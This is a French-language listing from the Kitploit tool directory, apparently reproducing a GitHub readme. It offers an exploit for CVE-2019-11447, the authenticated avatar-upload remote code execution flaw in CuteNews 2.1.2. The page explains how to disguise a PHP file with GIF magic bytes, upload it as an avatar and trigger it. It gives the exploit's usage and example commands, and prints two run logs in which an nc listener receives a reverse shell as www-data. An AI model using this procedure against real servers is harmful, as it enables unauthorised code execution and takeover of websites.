Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-11447_CuteNews-AvatarUploadRCE — Code d'exploitation pour CVE-2019-11447 alias CuteNews 2.1.2 Avatar upload RCE (Authentifié) | Kitploit
Outils/GitHubGitHub/coldfusionx/cve-2019-11447_cutenews-avataruploadrce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcoldfusionx/cve-2019-11447_cutenews-avataruploadrce

CVE-2019-11447_CuteNews-AvatarUploadRCE

Code d'exploitation pour CVE-2019-11447 alias CuteNews 2.1.2 Avatar upload RCE (Authentifié)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
3il y a 5 ansPas encore vérifié
Partager

CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Téléchargement d'avatar RCE (Authentifié)

Code d'exploit pour CVE-2019-11447 alias CuteNews 2.1.2 Téléchargement d'avatar RCE (Authentifié)

Liens de l'exploit :

Résultat attendu : Connecter/Enregistrer un compte, fabriquer un fichier PHP sélectionné par l'utilisateur avec des octets magiques .gif, télécharger le fichier en tant qu'avatar et le déclencher pour obtenir une exécution de code à distance.

Destiné uniquement à des fins éducatives et de test dans des environnements professionnels.

Cet exploit a été testé sur Python 3.8.6

Usage

root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

Entrées utilisateur :

Cet exploit attend quatre arguments pour s'exécuter initialement :

  • -l : URL de CuteNews
  • -u : Nom d'utilisateur requis pour se connecter/s'enregistrer
  • -p : Mot de passe requis pour se connecter/s'enregistrer
  • -e : Email requis pour se connecter/s'enregistrer

Entrées utilisateur supplémentaires requises :

  • Select your PHP file -> Ici, l'utilisateur doit spécifier le fichier PHP à télécharger, il peut s'agir de n'importe quel fichier PHP. Exemple : PHP info, PHP reverse shell. Si le fichier PHP se trouve dans le même répertoire que les exploits, l'utilisateur peut simplement spécifier le nom du fichier :

Exemple : [^] Select your PHP file -> rev.php

Sinon, l'utilisateur doit spécifier l'emplacement du fichier PHP :

Exemple : [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> Ici, si l'utilisateur a téléchargé un reverse shell PHP, il a le choix de déclencher le reverse shell en utilisant y/n.

Dans les deux cas, l'exploit est conçu pour afficher l'emplacement du fichier téléchargé pour une utilisation ultérieure.

Exécution de l'exploit

  • Scénario 1 > Connexion avec des identifiants existants et obtention d'un reverse shell :
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • Scénario 2 > Enregistrement d'un nouvel utilisateur et obtention d'un reverse shell :
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

Référence

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
Télécharger l’outil